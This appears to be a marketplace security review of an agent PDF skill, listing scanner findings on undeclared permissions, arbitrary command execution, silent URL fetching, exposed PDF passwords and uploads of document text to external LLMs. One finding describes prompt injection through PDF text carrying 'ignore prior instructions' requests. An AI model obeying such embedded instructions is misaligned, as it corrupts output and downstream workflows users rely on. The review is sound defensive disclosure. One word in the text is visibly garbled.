ClawHub

PR's PDF Agent

Security checks across malware telemetry and agentic risk

Overview

This PDF skill mostly does what it claims, but it has under-disclosed features that can fetch URLs, run user-supplied LLM commands, and expose PDF passwords through local process arguments.

Review before installing in sensitive environments. Use it only on PDFs and URLs you trust, avoid the translate feature for confidential documents unless you control the LLM backend, do not use --llm-cmd with untrusted commands, and be aware that PDF passwords may be visible to other local users or monitoring tools while qpdf runs.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • Excessive AgencyUnrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • Trigger AbuseOverly Broad Trigger, Shadow Command Trigger, Keyword Baiting Trigger
  • MCP Least PrivilegeUnderdeclared Capability, Wildcard Permission, Missing Permission Declaration
  • MCP Tool PoisoningHidden Instructions, Unicode Deception, Parameter Description Injection
Findings (11)

Lp3

Medium
Category
MCP Least Privilege
Confidence
88% confidence
Finding
The skill advertises executable capabilities including shell, file read/write, environment access, and network behavior, yet the manifest does not declare permissions or clearly bound those powers. This weakens sandboxing and user consent, making it easier for an agent or downstream user to invoke risky operations without realizing the full trust boundary.

Tp4

High
Category
MCP Tool Poisoning
Confidence
94% confidence
Finding
The documented purpose presents a narrow self-hosted PDF tool, but the behavior includes natural-language agent planning, external LLM integration, translation via external providers, and remote HTTP/HTTPS fetching. That mismatch can cause operators to grant trust appropriate for offline PDF processing while the skill actually interprets prompts, reaches external services, and processes remote content, substantially increasing attack surface and data exfiltration risk.

Context-Inappropriate Capability

Medium
Confidence
72% confidence
Finding
The helper exposes broad arbitrary external command execution capability that exceeds the stated PDF-focused purpose of the skill. Even if this file does not itself show attacker-controlled input reaching the helper, such a generic primitive materially increases the attack surface because other parts of the skill can use it to run non-PDF commands, bypass intended scope, or invoke risky binaries with inherited permissions.

Context-Inappropriate Capability

Medium
Confidence
93% confidence
Finding
This code permits arbitrary external command execution when `provider == "command"` by accepting a caller-supplied `cmd` string, splitting it, and executing it via `run_cmd`. Even though it avoids shell invocation directly, it still allows execution of any local program and can pass untrusted prompt data either on stdin or interpolated into arguments, which is dangerous if an attacker can influence configuration or request parameters.

Context-Inappropriate Capability

Medium
Confidence
89% confidence
Finding
The fallback path performs arbitrary outbound HTTP(S) requests when the input looks like a URL. In a 'self-hosted PDF operations' skill, this expands the trust boundary from local conversion into network retrieval, which can enable SSRF-style access to internal services, unexpected data exfiltration paths, or policy violations if untrusted users control the source parameter.

Description-Behavior Mismatch

Medium
Confidence
94% confidence
Finding
The function sends full PDF-extracted content to `generate_text`, which may route data to an external/provider-backed LLM despite the skill being ներկայացred as self-hosted PDF operations. This creates a real confidentiality and trust-boundary issue because users may reasonably expect local-only handling of document contents, especially for sensitive PDFs.

Missing User Warnings

Medium
Confidence
86% confidence
Finding
The code silently issues outbound network requests for URL inputs without any explicit disclosure or opt-in. In a self-hosted environment, this can surprise operators, violate network isolation expectations, and amplify the SSRF risk created by accepting attacker-controlled URLs.

Missing User Warnings

Medium
Confidence
94% confidence
Finding
The unlock operation passes the PDF password directly on the command line via `--password=...`. Command-line arguments are often visible to other local users through process listings, shell history, logs, crash reports, or monitoring tools, which can expose sensitive credentials during execution. In a self-hosted PDF tool, users may reasonably supply real document passwords, so this handling creates a genuine secret-leakage risk.

Missing User Warnings

Medium
Confidence
95% confidence
Finding
The protect operation invokes `qpdf --encrypt` with both user and owner passwords as positional command-line arguments. This exposes encryption credentials through the process table and related telemetry, weakening the confidentiality of protected PDFs and potentially allowing unauthorized access or policy bypass if another user or service can observe the command while it runs. The skill's purpose—PDF protection—makes safe password handling especially important, so the context increases the significance of the issue.

Missing User Warnings

Medium
Confidence
91% confidence
Finding
The code extracts all text from the PDF and sends it to the LLM without any visible warning, disclosure, or consent mechanism. For documents containing personal, regulated, or confidential information, this can lead to unintended data exfiltration to third-party services and violate user expectations or compliance requirements.

Ssd 1

Medium
Confidence
89% confidence
Finding
Untrusted PDF text is concatenated directly into the translation prompt, so document content can include prompt-injection instructions such as requests to ignore prior instructions, transform output format, or append attacker-chosen text. While this code only appears to request translated text, prompt injection can still corrupt output integrity, trigger policy-violating responses, or manipulate downstream workflows that trust the translation result.

VirusTotal

64/64 vendors flagged this skill as clean.

View on VirusTotal